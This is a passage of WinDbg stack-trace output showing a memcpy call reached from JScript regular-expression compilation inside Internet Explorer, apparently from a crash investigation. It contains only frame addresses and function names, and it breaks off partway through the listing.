\n \n0:012> k \n# Child-SP RetAddr Call Site \n00 00000000`12399ef8 000007fe`ebc88bb3 msvcrt!memcpy+0x1d9 \n01 00000000`12399f00 000007fe`ebcfacc2 jscript!RegExpComp::Compile+0x1b7 \n02 00000000`12399f60 000007fe`ebce2118 jscript!RegExpComp::CompileDynamic+0x62 \n03 00000000`12399fa0 000007fe`ebce3310 jscript!RegExpObj::Compile+0x32c \n04 00000000`1239a0f0 000007fe`ebc7c2ec jscript!JsRegExpCompile+0x70 \n05 00000000`1239a140 000007fe`ebc7a9fe jscript!NatFncObj::Call+0x138 \n06 00000000`1239a1f0 000007fe`ebc7b234 jscript!NameTbl::InvokeInternal+0x3f8 \n07 00000000`1239a310 000007fe`ebc79852 jscript!VAR::InvokeByName+0x81c \n08 00000000`1239a520 000007fe`ebc79929 jscript!VAR::InvokeDispName+0x72 \n09 00000000`1239a5a0 000007fe`ebc724b8 jscript!VAR::InvokeByDispID+0x1229 \n0a 00000000`1239a5f0 000007fe`ebc78ec2 jscript!CScriptRuntime::Run+0x5a6 \n0b 00000000`1239b3f0 000007fe`ebc78d2b jscript!ScrFncObj::CallWithFrameOnStack+0x162 \n0c 00000000`1239b600 000007fe`ebc78b95 jscript!ScrFncObj::Call+0xb7 \n0d 00000000`1239b6a0 000007fe`ebc7e6c0 jscript!CSession::Execute+0x19e \n0e 00000000`1239b770 000007fe`ebc870e7 jscript!COleScript::ExecutePendingScripts+0x17a \n0f 00000000`1239b840 000007fe`ebc868d6 jscript!COleScript::ParseScriptTextCore+0x267 \n10 00000000`1239b930 000007fe`ecdf5251 jscript!COleScript::ParseScriptText+0x56 \n11 00000000`1239b990 000007fe`ed57b320 MSHTML!CActiveScriptHolder::ParseScriptText+0xc1 \n12 00000000`1239ba10 000007fe`ecdf6256 MSHTML!CScriptCollection::ParseScriptText+0x37f \n13 00000000`1239baf0 000007fe`ecdf5c8e MSHTML!CScriptData::CommitCode+0x3d9 \n14 00000000`1239bcc0 000007fe`ecdf5a11 MSHTML!CScriptData::Execute+0x283 \n15 00000000`1239bd80 000007fe`ed5b46fb MSHTML!CHtmScriptParseCtx::Execute+0x101 \n16 00000000`1239bdc0 000007fe`ece98a5b MSHTML!CHtmParseBase::Execute+0x235 \n17 00000000`1239be60 000007fe`ecd72e39 MSHTML!CHtmPost::Broadcast+0x90 \n18 00000000`1239bea0 000007fe`ecdccaef MSHTML!CHtmPost::Exec+0x4bb \n19 00000000`1239c0b0 
000007fe`ecdcca40 MSHTML!CHtmPost::Run+0x3f \n1a 00000000`1239c0e0 000007fe`ecdcda12 MSHTML!PostManExecute+0x70 \n1b 00000000`1239c160 000007fe`ecdd0843 MSHTML!PostManResume+0xa1 \n1c 00000000`1239c1a0 000007fe`ecdb6fc7 MSHTML!CHtmPost::OnDwnChanCallback+0x43 \n1d 00000000`1239c1f0 000007fe`ed5e4f78 MSHTML!CDwnChan::OnMethodCall+0x41 \n1e 00000000`1239c220 000007fe`eccd9d75 MSHTML!GlobalWndOnMethodCall+0x240 \n1f 00000000`1239c2c0 00000000`77229bbd MSHTML!GlobalWndProc+0x150 \n20 00000000`1239c340 00000000`772298c2 USER32!UserCallWinProcCheckWow+0x1ad \n21 00000000`1239c400 000007fe`f29d4a87 USER32!DispatchMessageWorker+0x3b5 \n22 00000000`1239c480 000007fe`f29dbabb IEFRAME!CTabWindow::_TabWindowThreadProc+0x555 \n23 00000000`1239f700 000007fe`fd73572f IEFRAME!LCIETab_ThreadProc+0x3a3 \n24 00000000`1239f830 000007fe`ee62925f iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1f \n25 00000000`1239f860 00000000`773259cd IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f \n26 00000000